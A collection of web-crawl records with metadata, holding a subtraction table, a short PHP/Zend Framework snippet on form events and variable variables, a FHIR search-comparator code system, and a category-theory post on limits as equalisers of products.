{"ft_lang_label":"__label__en","ft_lang_prob":0.7478965,"math_prob":0.97633594,"size":384,"snap":"2020-45-2020-50","text_gpt3_token_len":133,"char_repetition_ratio":0.09736842,"word_repetition_ratio":0.0,"special_character_ratio":0.37760416,"punctuation_ratio":0.1904762,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9934546,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-06T02:24:16Z\",\"WARC-Record-ID\":\"<urn:uuid:a839b97e-b226-4b6a-bfdf-a32ba2cfd252>\",\"Content-Length\":\"118298\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1896c1bf-5581-44a0-9260-b56ece5e8f59>\",\"WARC-Concurrent-To\":\"<urn:uuid:dadf9549-1933-42bf-a0bb-61fa6c01a866>\",\"WARC-IP-Address\":\"184.25.198.13\",\"WARC-Target-URI\":\"https://au.mathworks.com/matlabcentral/answers/579159-logarithmic-scale-with-a-different-base\",\"WARC-Payload-Digest\":\"sha1:6CZA5WH6ODFTGT4FN5HDVI4RJERJGAWR\",\"WARC-Block-Digest\":\"sha1:PQPDOZOGJY2L4HHO4HBW5JSX2TVO6U7J\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141753148.92_warc_CC-MAIN-20201206002041-20201206032041-00341.warc.gz\"}"}
http://num.bubble.ro/s/2581/806/
[ "# Substraction table for N = 2581 - 805÷806\n\n2581 - 805 = 1776 [+]\n2581 - 805.01 = 1775.99 [+]\n2581 - 805.02 = 1775.98 [+]\n2581 - 805.03 = 1775.97 [+]\n2581 - 805.04 = 1775.96 [+]\n2581 - 805.05 = 1775.95 [+]\n2581 - 805.06 = 1775.94 [+]\n2581 - 805.07 = 1775.93 [+]\n2581 - 805.08 = 1775.92 [+]\n2581 - 805.09 = 1775.91 [+]\n2581 - 805.1 = 1775.9 [+]\n2581 - 805.11 = 1775.89 [+]\n2581 - 805.12 = 1775.88 [+]\n2581 - 805.13 = 1775.87 [+]\n2581 - 805.14 = 1775.86 [+]\n2581 - 805.15 = 1775.85 [+]\n2581 - 805.16 = 1775.84 [+]\n2581 - 805.17 = 1775.83 [+]\n2581 - 805.18 = 1775.82 [+]\n2581 - 805.19 = 1775.81 [+]\n2581 - 805.2 = 1775.8 [+]\n2581 - 805.21 = 1775.79 [+]\n2581 - 805.22 = 1775.78 [+]\n2581 - 805.23 = 1775.77 [+]\n2581 - 805.24 = 1775.76 [+]\n2581 - 805.25 = 1775.75 [+]\n2581 - 805.26 = 1775.74 [+]\n2581 - 805.27 = 1775.73 [+]\n2581 - 805.28 = 1775.72 [+]\n2581 - 805.29 = 1775.71 [+]\n2581 - 805.3 = 1775.7 [+]\n2581 - 805.31 = 1775.69 [+]\n2581 - 805.32 = 1775.68 [+]\n2581 - 805.33 = 1775.67 [+]\n2581 - 805.34 = 1775.66 [+]\n2581 - 805.35 = 1775.65 [+]\n2581 - 805.36 = 1775.64 [+]\n2581 - 805.37 = 1775.63 [+]\n2581 - 805.38 = 1775.62 [+]\n2581 - 805.39 = 1775.61 [+]\n2581 - 805.4 = 1775.6 [+]\n2581 - 805.41 = 1775.59 [+]\n2581 - 805.42 = 1775.58 [+]\n2581 - 805.43 = 1775.57 [+]\n2581 - 805.44 = 1775.56 [+]\n2581 - 805.45 = 1775.55 [+]\n2581 - 805.46 = 1775.54 [+]\n2581 - 805.47 = 1775.53 [+]\n2581 - 805.48 = 1775.52 [+]\n2581 - 805.49 = 1775.51 [+]\n2581 - 805.5 = 1775.5 [+]\n2581 - 805.51 = 1775.49 [+]\n2581 - 805.52 = 1775.48 [+]\n2581 - 805.53 = 1775.47 [+]\n2581 - 805.54 = 1775.46 [+]\n2581 - 805.55 = 1775.45 [+]\n2581 - 805.56 = 1775.44 [+]\n2581 - 805.57 = 1775.43 [+]\n2581 - 805.58 = 1775.42 [+]\n2581 - 805.59 = 1775.41 [+]\n2581 - 805.6 = 1775.4 [+]\n2581 - 805.61 = 1775.39 [+]\n2581 - 805.62 = 1775.38 [+]\n2581 - 805.63 = 1775.37 [+]\n2581 - 805.64 = 1775.36 [+]\n2581 - 805.65 = 1775.35 [+]\n2581 - 805.66 = 1775.34 [+]\n2581 - 805.67 = 1775.33 [+]\n2581 - 805.68 = 1775.32 [+]\n2581 - 805.69 = 1775.31 [+]\n2581 - 805.7 = 1775.3 [+]\n2581 - 805.71 = 1775.29 [+]\n2581 - 805.72 = 1775.28 [+]\n2581 - 805.73 = 1775.27 [+]\n2581 - 805.74 = 1775.26 [+]\n2581 - 805.75 = 1775.25 [+]\n2581 - 805.76 = 1775.24 [+]\n2581 - 805.77 = 1775.23 [+]\n2581 - 805.78 = 1775.22 [+]\n2581 - 805.79 = 1775.21 [+]\n2581 - 805.8 = 1775.2 [+]\n2581 - 805.81 = 1775.19 [+]\n2581 - 805.82 = 1775.18 [+]\n2581 - 805.83 = 1775.17 [+]\n2581 - 805.84 = 1775.16 [+]\n2581 - 805.85 = 1775.15 [+]\n2581 - 805.86 = 1775.14 [+]\n2581 - 805.87 = 1775.13 [+]\n2581 - 805.88 = 1775.12 [+]\n2581 - 805.89 = 1775.11 [+]\n2581 - 805.9 = 1775.1 [+]\n2581 - 805.91 = 1775.09 [+]\n2581 - 805.92 = 1775.08 [+]\n2581 - 805.93 = 1775.07 [+]\n2581 - 805.94 = 1775.06 [+]\n2581 - 805.95 = 1775.05 [+]\n2581 - 805.96 = 1775.04 [+]\n2581 - 805.97 = 1775.03 [+]\n2581 - 805.98 = 1775.02 [+]\n2581 - 805.99 = 1775.01 [+]\nNavigation: Home | Addition | Substraction | Multiplication | Division       Tables for 2581: Addition | Substraction | Multiplication | Division\n\nOperand: 1 2 3 4 5 6 7 8 9 10 20 30 40 50 60 70 80 90 100 200 300 400 500 600 700 800 801 802 803 804 805 806 807 808 809 900 1000 2000 3000 4000 5000 6000 7000 8000 9000\n\nSubstraction for: 1 2 3 4 5 6 7 8 9 10 20 30 40 50 60 70 80 90 100 200 300 400 500 600 700 800 900 1000 2000 2581 2582 2583 2584 2585 2586 2587 2588 2589 3000 4000 5000 6000 7000 8000 9000" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8587403,"math_prob":0.99984634,"size":17441,"snap":"2020-45-2020-50","text_gpt3_token_len":4241,"char_repetition_ratio":0.39117968,"word_repetition_ratio":0.52095133,"special_character_ratio":0.28736883,"punctuation_ratio":0.064896755,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9986272,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-30T01:29:14Z\",\"WARC-Record-ID\":\"<urn:uuid:55f1bd43-ff74-4428-be64-e82736637514>\",\"Content-Length\":\"49146\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f596da80-5df3-4fd7-9f76-f7f3875f4f88>\",\"WARC-Concurrent-To\":\"<urn:uuid:0ca68d73-22b7-4897-ad71-fe77adcb7836>\",\"WARC-IP-Address\":\"172.67.221.34\",\"WARC-Target-URI\":\"http://num.bubble.ro/s/2581/806/\",\"WARC-Payload-Digest\":\"sha1:IVCLPP5NFRGCOB4QT2NL7WF4FQMV6L2O\",\"WARC-Block-Digest\":\"sha1:5YM3TNZMJ3M2QJR2KEMEH3KVT5FVXZAB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107906872.85_warc_CC-MAIN-20201030003928-20201030033928-00399.warc.gz\"}"}
https://number1.co.za/2013/11/
[ "# Add Events to Zend_Forms Zend Framework\n\n``` \\$type = new Zend_Form_Element_Select('type',array('onchange' => 'alert(\"working\")')); ```\n\n# using PHP Values as Variable names and to call Functions\n\nThis should apply to perl as well:\n\nVariable name:\n\n```\\$myvar = 'foo'; \\${\\$myvar} = 'haswell'; echo \\$foo RESULT 'haswell'```\n\nCall a function:\n\n```\\$type = 'red'; \\$myClass->\\$type(); == \\$myClass->red();```\n\nTaken from:\n\n``` \\${\"variableName\"} = 12; {\"functionName\"}();```\n\n``` \\$className->{\"variableName\"}; \\$className->{\"methodName\"}(); ```\n\n```StaticClass::\\${\"variableName\"}; StaticClass::{\"methodName\"}(); ```\n\nAre there any other Languages that can do this, I know Perl Can...\n\nAnd What is this ability called?\n\n``` foreach (array_expression as \\$key => \\$value) { echo \\$key; } ```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5916817,"math_prob":0.78425336,"size":787,"snap":"2021-43-2021-49","text_gpt3_token_len":205,"char_repetition_ratio":0.107279696,"word_repetition_ratio":0.0,"special_character_ratio":0.29860228,"punctuation_ratio":0.22137405,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95663184,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-28T07:24:39Z\",\"WARC-Record-ID\":\"<urn:uuid:87c854d1-ce76-4e39-af28-7d642df7a6bb>\",\"Content-Length\":\"48037\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2fa6bce4-b13c-4cdf-8812-de7d5d9dc391>\",\"WARC-Concurrent-To\":\"<urn:uuid:8e3224d9-a313-4ac3-bc4e-6b4955a686c5>\",\"WARC-IP-Address\":\"37.139.28.74\",\"WARC-Target-URI\":\"https://number1.co.za/2013/11/\",\"WARC-Payload-Digest\":\"sha1:AIGDO55OHB5ZJVFGRHY77CAQV2VCED5B\",\"WARC-Block-Digest\":\"sha1:VLZNK6TVAEOMBTVVLHTITUT37O4PO5Z3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323588282.80_warc_CC-MAIN-20211028065732-20211028095732-00348.warc.gz\"}"}
http://build.fhir.org/codesystem-search-comparator.canonical.xml
[ "This code system http://hl7.org/fhir/search-comparator defines the following codes:\n\n Code Display Definition eq Equals the value for the parameter in the resource is equal to the provided value. ne Not Equals the value for the parameter in the resource is not equal to the provided value. gt Greater Than the value for the parameter in the resource is greater than the provided value. lt Less Than the value for the parameter in the resource is less than the provided value. ge Greater or Equals the value for the parameter in the resource is greater or equal to the provided value. le Less of Equal the value for the parameter in the resource is less or equal to the provided value. sa Starts After the value for the parameter in the resource starts after the provided value. eb Ends Before the value for the parameter in the resource ends before the provided value. ap Approximately the value for the parameter in the resource is approximately the same to the provided value.\n<status value=\"draft\"/><experimental value=\"false\"/><date value=\"2021-01-05T10:01:24+11:00\"/><publisher value=\"HL7 (FHIR Project)\"/><contact><telecom><system value=\"url\"/><value value=\"http://hl7.org/fhir\"/></telecom><telecom><system value=\"email\"/><value value=\"[email protected]\"/></telecom></contact><description value=\"What Search Comparator Codes are supported in search.\"/><caseSensitive value=\"true\"/><valueSet value=\"http://hl7.org/fhir/ValueSet/search-comparator\"/><content value=\"complete\"/><concept><code value=\"eq\"/><display value=\"Equals\"/><definition value=\"the value for the parameter in the resource is equal to the provided value.\"/></concept><concept><code value=\"ne\"/><display value=\"Not Equals\"/><definition value=\"the value for the parameter in the resource is not equal to the provided value.\"/></concept><concept><code value=\"gt\"/><display value=\"Greater Than\"/><definition value=\"the value for the parameter in the resource is greater than the provided value.\"/></concept><concept><code value=\"lt\"/><display value=\"Less Than\"/><definition value=\"the value for the parameter in the resource is less than the provided value.\"/></concept><concept><code value=\"ge\"/><display value=\"Greater or Equals\"/><definition value=\"the value for the parameter in the resource is greater or equal to the provided value.\"/></concept><concept><code value=\"le\"/><display value=\"Less of Equal\"/><definition value=\"the value for the parameter in the resource is less or equal to the provided value.\"/></concept><concept><code value=\"sa\"/><display value=\"Starts After\"/><definition value=\"the value for the parameter in the resource starts after the provided value.\"/></concept><concept><code value=\"eb\"/><display value=\"Ends Before\"/><definition value=\"the value for the parameter in the resource ends before the provided value.\"/></concept><concept><code value=\"ap\"/><display value=\"Approximately\"/><definition value=\"the value for the parameter in the resource is approximately the same to the provided value.\"/></concept></CodeSystem>" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.51535994,"math_prob":0.9747548,"size":1006,"snap":"2022-05-2022-21","text_gpt3_token_len":220,"char_repetition_ratio":0.22055888,"word_repetition_ratio":0.35151514,"special_character_ratio":0.21471173,"punctuation_ratio":0.06451613,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9669392,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-19T23:28:47Z\",\"WARC-Record-ID\":\"<urn:uuid:4421049b-b2a3-4e39-9ba3-015c9fd45c44>\",\"Content-Length\":\"7231\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:15d4161b-37e9-47ac-bdca-107ca72e70a1>\",\"WARC-Concurrent-To\":\"<urn:uuid:d4b4955a-ba97-4628-a7b4-28f544aa1701>\",\"WARC-IP-Address\":\"35.190.153.146\",\"WARC-Target-URI\":\"http://build.fhir.org/codesystem-search-comparator.canonical.xml\",\"WARC-Payload-Digest\":\"sha1:WVUYI2DMY7HDIMOENGDGM4BIPWUO6XHM\",\"WARC-Block-Digest\":\"sha1:MZFCLR4JRK6EMA56ZANA4XK7GCWOL2WD\",\"WARC-Identified-Payload-Type\":\"application/xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320301592.29_warc_CC-MAIN-20220119215632-20220120005632-00166.warc.gz\"}"}
https://lovelylittlelemmas.rjprojects.net/limits-as-equalisers-of-products/
[ "# Limits as equalisers of products\n\nThe first and second corollary below are well-known category theory lemmas. We give a slightly different argument than usual (i.e. we took a trivial result and changed it into something much more complicated).\n\nHere is a lovely little definition:\n\nDefinition. Given a small diagram", null, "of sets, write", null, "for the small category with", null, "and morphisms", null, "for", null, "and", null, "(where", null, "), with composition induced by composition of maps", null, ".\n\nExample 1. If", null, ", then a diagram", null, "is a pair of sets", null, "with parallel arrows", null, ". Then", null, "looks like a ‘bipartite preorder’ where every source object has outgoing valence", null, ":", null, "Example 2. Given a set", null, ", write", null, "for the discrete category on", null, ", i.e.", null, "and", null, "If", null, "is itself a discrete category, then", null, "is just a collection", null, "of sets, and", null, "Remark. Giving a functor", null, "is the same thing as giving functors", null, "and natural transformations", null, "of functors", null, "for all", null, "in", null, ", such that", null, "for all", null, "in", null, "(where", null, "denotes horizontal composition of natural transformations, as in Tag 003G).\n\nExample 3.  Let", null, "be a small category, and consider the diagram", null, "given by the source and target maps", null, ". Then we have a functor", null, "given on objects by", null, "and on morphisms by", null, "In terms of the remark above, it is given by the functors", null, "taking", null, "to", null, "and the natural inclusion", null, ", along with the natural transformations", null, "We can now formulate the main result.\n\nLemma. Let", null, "be a small category. hen the functor", null, "of Example 3 is cofinal.\n\nRecall that a functor", null, "is cofinal if for all", null, ", the comma category", null, "is nonemptry and connected. See also Tag 04E6 for a concrete translation of this definition.\n\nProof. Let", null, ". Since", null, ", the identity", null, "gives the object", null, "in", null, ", showing nonemptyness. For connectedness, it suffices to connect any", null, "(i.e.", null, ") to the identity", null, ") (i.e.", null, "). If", null, ", then the commutative diagram", null, "gives a zigzag", null, "of morphisms in", null, "connecting", null, "to", null, ". If instead", null, ", we can skip the first step, and the diagram", null, "gives a zigzag", null, "connecting", null, "to", null, ".", null, "Corollary 1. Let", null, "be a small diagram in a category", null, "with small products. Then there is a canonical isomorphism", null, "provided that either side exists.\n\nProof. By the lemma, the functor", null, "is initial. Hence by Tag 002R, the natural morphism", null, "is an isomorphism if either side exists. But", null, "is a category as in Example 1, and it’s easy to see that the limit over a diagram", null, "is computed as the equaliser of a pair of arrows between the products.", null, "Of course this is not an improvement of the traditional proof, because the “it’s easy to see” step at the end is very close to the same statement as the corollary in the special case where", null, "is of the form", null, "for some", null, ". But it’s fun to move the argument almost entirely away from limits and into the index category.\n\nCorollary 2. Let", null, "be a category that has small products and equalisers of parallel pairs of arrows. Then", null, "is (small) complete.", null, "" ]
[ null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-51068fe2a36403636ed5fe4916a9c7e5_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-267546e1bc8173b01c501fc60f1e305b_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-4e02977ba08ed15e4450c4cd2138fbb5_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ac14539cfc0c404b51a2d52826838078_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-9766dab0e965a5dc216f1904cf8d4f8f_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-b117e14276c8591a1b697ac36aecab2d_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-08d6f52e51547b5a5bde4a0c2014c729_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-4fe012527d4046f7572859416e98db3a_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-d3d02118e40450d3496d960441da453b_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ea829a1a917780f8f1e914af42c65256_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-3e5f055543c684c62925a5dc85ea0c14_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-f76470fc6a930d19553502a7c8c0476f_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-267546e1bc8173b01c501fc60f1e305b_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-4ea2644bcccbf698d19e45c913c0c0b4_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-3dad4905bde74cc465592974829af771_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-8b04cd340e234f344ec091bdd203bd99_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-714abc6bc11f2c311b779988ac248397_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-8b04cd340e234f344ec091bdd203bd99_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-1ce551bc46d36db8120babbdbd46f44a_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-17fb2a0014459208d7a6901c497bf20c_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-3abf7dcf039cd59d84efd542ea35cd8a_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ea829a1a917780f8f1e914af42c65256_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-efbc33b4d0ba3999ed5d37b190167f76_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-f1e076751a68f543e7ce61d8115d3104_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-31df41f6e0342044a2c260a0da4d2c99_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-07dd3b99de0a35eb57a877510c861f1f_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-f0896565bef68248ec2c6edea41de7bf_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ac72c4e2a41c4487bc4262e39d33c326_l3.svg", null, 
"https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-c03673f86656fc23613166ed7912d288_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-387bc32ba2d731f56de80916da2adf3c_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-aa33453a1e48d3640e794fabebbe53ee_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-7d9e42da293e2d1d8ebfe6815e4c6a3d_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-387bc32ba2d731f56de80916da2adf3c_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-34cd33d03bb56da06e79574d6ecc96a2_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-387bc32ba2d731f56de80916da2adf3c_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ddfc119fb73664240c67e849be650e79_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-2b0de8ab12e1df0974f3e476ff17d376_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-3e483eb78491fab528458d329c6ba5bf_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-8ae5639a9a720646418db2073d361a7a_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-a701b5199b129c958b64f2583a869c1e_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-bf4e22fe2ee96995ff397deadc45adb6_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-a968daa9d3e2316722c449e8564a335e_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-453b874e6d1d6b471d6aa9a998a5a95d_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-9fcaac56e8adb8e922b8b0141fa6e967_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-909315230a08d3569d54d48052262a30_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-387bc32ba2d731f56de80916da2adf3c_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-1c3e0275f86a1f64a16b4e8238f54f89_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-30e40b3560531b59f37586cb1ede5778_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-56ceca4b72422bca7cbab1de472e874d_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-f7fbfc5a33fc6e3d8ef37359169437b0_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-830a5abd038e68e618c7a574601c553e_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-4436600509ffe9a46e83491ef7f6f6fb_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-1be640341f56f5ab1875e1931e2e5de7_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-144f30bd35437a5c1807e06f85d0ef4b_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-f7fbfc5a33fc6e3d8ef37359169437b0_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-04a0b73370f72eb40f380fb870d73dc5_l3.svg", null, 
"https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-86b4e576e08766d6891c3b68cf24a118_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-d5cfa90a29059c21b2cd18abe4a7c3b3_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ff9b1119632f08be9ff7fa219d1b4ac7_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-c1faa31640ad7163fdd29849616d9389_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-caaecb51ac719235cf94092a10723a35_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-c3f77cd18c51fc6622a2624a89dae66b_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-f7fbfc5a33fc6e3d8ef37359169437b0_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-04a0b73370f72eb40f380fb870d73dc5_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-144f30bd35437a5c1807e06f85d0ef4b_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-86936311d91c1c07dcb0585c7ccfaa27_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-aad38941200d66f927b4def003a3f3dc_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ab3078445ca3e9365f5f8d92a62e9e69_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-04a0b73370f72eb40f380fb870d73dc5_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-144f30bd35437a5c1807e06f85d0ef4b_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ee0d727242cede2ba48c8d3c4c849723_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-8510c9ef211011acc00933cd701bed9e_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-a697c5d767cc7d956ca02a3243cabfa3_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-4916dc4f1511579a25976fa012c285d6_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-eec3b4e4e5469015b07f734ef12f7ec1_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-865826a3461ad8a09252e292df098c52_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-37dfdd0d755b57accf735a9d449559d8_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-922802023aae2d87fad79bcbfcbffc53_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ee0d727242cede2ba48c8d3c4c849723_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-387bc32ba2d731f56de80916da2adf3c_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-267546e1bc8173b01c501fc60f1e305b_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-10f528525492de9591354f3e48730043_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-a697c5d767cc7d956ca02a3243cabfa3_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-a697c5d767cc7d956ca02a3243cabfa3_l3.svg", null, 
"https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ee0d727242cede2ba48c8d3c4c849723_l3.svg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8870463,"math_prob":0.97834325,"size":2683,"snap":"2020-45-2020-50","text_gpt3_token_len":622,"char_repetition_ratio":0.117207915,"word_repetition_ratio":0.0,"special_character_ratio":0.2202758,"punctuation_ratio":0.12569316,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9927265,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170],"im_url_duplicate_count":[null,2,null,6,null,2,null,2,null,3,null,2,null,2,null,2,null,2,null,null,null,2,null,2,null,6,null,null,null,2,null,null,null,2,null,null,null,2,null,2,null,2,null,null,null,2,null,2,null,2,null,2,null,2,null,2,null,3,null,10,null,2,null,2,null,10,null,2,null,10,null,2,null,2,null,2,null,2,null,2,null,2,n